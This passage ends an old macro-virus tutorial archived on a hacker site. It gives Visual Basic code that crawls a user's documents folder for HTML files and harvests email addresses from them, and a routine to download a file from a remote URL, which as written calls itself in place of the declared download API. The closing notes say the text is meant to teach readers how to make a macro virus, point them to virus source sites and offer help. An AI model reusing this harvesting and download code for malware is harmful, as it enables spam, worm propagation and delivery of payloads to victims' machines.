     Private Declare Function FindClose Lib "kernel32" _
     (ByVal hFindFile As Long) As Long

     Const MAX_PATH = 260
     Const MAXDWORD = &HFFFF
     Const INVALID_HANDLE_VALUE = -1
     Const FILE_ATTRIBUTE_ARCHIVE = &H20
     Const FILE_ATTRIBUTE_DIRECTORY = &H10
     Const FILE_ATTRIBUTE_HIDDEN = &H2
     Const FILE_ATTRIBUTE_NORMAL = &H80
     Const FILE_ATTRIBUTE_READONLY = &H1
     Const FILE_ATTRIBUTE_SYSTEM = &H4
     Const FILE_ATTRIBUTE_TEMPORARY = &H100

     Private Type FILETIME
     dwLowDateTime As Long
     dwHighDateTime As Long
     End Type

     Private Type WIN32_FIND_DATA
     dwFileAttributes As Long
     ftCreationTime As FILETIME
     ftLastAccessTime As FILETIME
     ftLastWriteTime As FILETIME
     nFileSizeHigh As Long
     nFileSizeLow As Long
     dwReserved0 As Long
     dwReserved1 As Long
     cFileName As String * MAX_PATH
     cAlternate As String * 14
     End Type

     Function StripNulls(OriginalStr As String) As String
     If (InStr(OriginalStr, Chr(0)) > 0) Then
     OriginalStr = Left(OriginalStr, _
     InStr(OriginalStr, Chr(0)) - 1)
     End If
     StripNulls = OriginalStr
     End Function

     Function FindFilesAPI(path As String, _
     SearchStr As String, _
     FileCount As Integer, _
     DirCount As Integer)
     Dim FileName As String ' variable holding filename
     Dim DirName As String ' variable holding subdir name
     Dim dirNames() As String ' filenames buffer
     Dim nDir As Integer ' number of directories in this path
     Dim i As Integer ' cycle counter
     Dim hSearch As Long ' search descriptor
     Dim WFD As WIN32_FIND_DATA
     Dim Cont As Integer
     If Right(path, 1) <> "\" Then path = path & "\"
     ' subdirectories search
     nDir = 0
     ReDim dirNames(nDir)
     Cont = True
     hSearch = FindFirstFile(path & "*", WFD)
     If hSearch <> INVALID_HANDLE_VALUE Then
     Do While Cont
     DirName = StripNulls(WFD.cFileName)
     If (DirName <> ".") And (DirName <> "..") Then
     ' checking directory
     If GetFileAttributes(path & DirName) And _
     FILE_ATTRIBUTE_DIRECTORY Then
     dirNames(nDir) = DirName
     DirCount = DirCount + 1
     nDir = nDir + 1
     ReDim Preserve dirNames(nDir)
     End If
     End If
     Cont = FindNextFile(hSearch, WFD)
     Loop
     Cont = FindClose(hSearch)
     End If
     hSearch = FindFirstFile(path & SearchStr, WFD)
     Cont = True
     If hSearch <> INVALID_HANDLE_VALUE Then
     While Cont
     FileName = StripNulls(WFD.cFileName)
     If (FileName <> ".") And (FileName <> "..") Then
     FindFilesAPI = FindFilesAPI + _
     (WFD.nFileSizeHigh * MAXDWORD) + _
     WFD.nFileSizeLow
     FileCount = FileCount + 1
     'List1.AddItem path & FileName
     ggg = path & FileName
     MsgBox ggg
     Call try(ggg)
     End If
     Cont = FindNextFile(hSearch, WFD) ' Get next file
     Wend
     Cont = FindClose(hSearch)
     End If
     ' if there are subdirectories
     If nDir > 0 Then
     ' perform recursive search
     For i = 0 To nDir - 1
     FindFilesAPI = FindFilesAPI + _
     FindFilesAPI(path & dirNames(i) _
     & "\", SearchStr, FileCount, DirCount)
     Next i
     End If
     End Function

     Private Sub Search()
     Dim SearchPath As String, FindStr As String
     Dim FileSize As Long
     Dim NumFiles As Integer, NumDirs As Integer
     Screen.MousePointer = vbHourglass
     'SearchPath = directory name
     SearchPath = "C:\My Documents"
     ' FindStr = filename we are searching for
     FindStr = "*.*htm"
     FileSize = FindFilesAPI(SearchPath, FindStr, NumFiles, NumDirs)
     Screen.MousePointer = vbDefault
     End
     End Sub

     Private Sub try(fName)
     On Error Resume Next
     WindowSize = 5000
     seekPoint = 1
     Open fName For Binary As 1
     Do While seekPoint < LOF(1)
     VarString$ = String$(WindowSize, " ")
     Get #1, seekPoint, VarString$
     seekPoint = seekPoint + WindowSize - 50
     AsIs = search_(VarString$)
     Loop
     Close #1
     End Sub
     Function mid_(a$, i, j1)
     On Error Resume Next
     s = 0
     If i > 0 And (i + j1 - 1) <= Len(a$) Then
     b$ = Mid$(a$, i, j1)
     If b$ >= "a" And b$ <= "z" Then s = 1
     If b$ >= "A" And b$ <= "Z" Then s = 1
     If b$ >= "0" And b$ <= "9" Then s = 1
     If b$ = "-" Or b$ = "_" Or b$ = "+" Or b$ = "." Or b$ = "@" Then s = 1
     End If
     mid_ = s
     End Function
     Function search_(a$)
     On Error Resume Next
     s$ = ""
     For i = 1 To Len(a$)
     If Mid$(a$, i, 1) = "@" Then
     name_ = "": j = i
     Do
     j = j - 1
     s = mid_(a$, j, 1)
     Loop While s = 1
     Do
     j = j + 1
     s = mid_(a$, j, 1)
     If s = 1 Then name_ = name_ + Mid$(a$, j, 1)
     Loop While s = 1
     s = 0: k = 0
     For j2 = 1 To Len(name_)
     If Mid$(name_, j2, 1) = "@" Then k = k + 1
     If Mid$(name_, j2, 1) = "." Then s = 1
     Next
     If k = 1 And s = 1 And Len(name_) > 5 And Left$(name_, 1) <> "@" And
     Right$(name_, 1) <> "@" Then MsgBox name_
     'Then UserForm1.addr.AddItem Name_
     End If
     If Mid$(a$, i, 1) <> "@" Then s$ = s$ + Mid$(a$, i, 1) Else s$ = s$ + " "
     Next
     search_ = s$
     End Function

     Download plugin
     This is a little procedure will download a file from specified URL. This 
     method is good for those, who do not use lot of code (compact code). No need 
     to use crap ala filesize etc. Have a look on it and enjoy.

     Procedure parameters:

     DownLoadPlugin "URL of the plugin", "name of the plugin"

     Code & Exemple:
     Private Sub Download()
     DownLoadPlugin "http://matrixvx.org", "plugin.plg"
     End Sub


     Public Declare Function DoFileDownload Lib "shdocvw.dll" (ByVal lpszFile As
     String) As Long

     Public Sub DownLoadPlugin(urlz As String, plugin As String)
     Dim DL As Long
     On Error GoTo errorz
     If urlz$ = "" Then urlz$ = strUrl$
     If strUrl$ = "" Then strUrl$ = urlz$
     If Left(strUrl$, 4) <> "http" Then strUrl$ = "http://" & strUrl$
     If Right$(strUrl$, 1) <> "/" Then strUrl$ = strUrl$ & "/"
     If Left$(plugin$, 1) = "/" Then plugin = Mid$(plugin$, 2)
     DL& = DownLoadPlugin(StrConv(strUrl$ & plugin$, vbUnicode))
     Exit Sub
     errorz:
     MsgBox "Can't download the fucking file" & urlz & plugin$ & ".", 
     vbCritical,
     "Oshibka - ERROR !!!!"
     End Sub


     -------------------------------------
     8**********************************************8
     8*************(Conclusion & Notes)*************8
     8**********************************************8

     Well, i hope this entire thing i wrote helped those of you who wanted to 
     learn how to
     make a macro virus, make one =]
     This is just the basics of it all- and a bit more extensive. Now it's your 
     duty to
     expand your knowledge =] How can you do this? Well, just go and look for 
     sources to
     MV's ( a good site is www.coderz.net ). Just surf around and you can find 
     them!
     If you have any difficulty and need some help, feel free to email me and i 
     will help
     as much as i can. Remember, to distibute viruses is illegal, to write them 
     isn't



     Credits

     by de@fuckmicrosoft.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH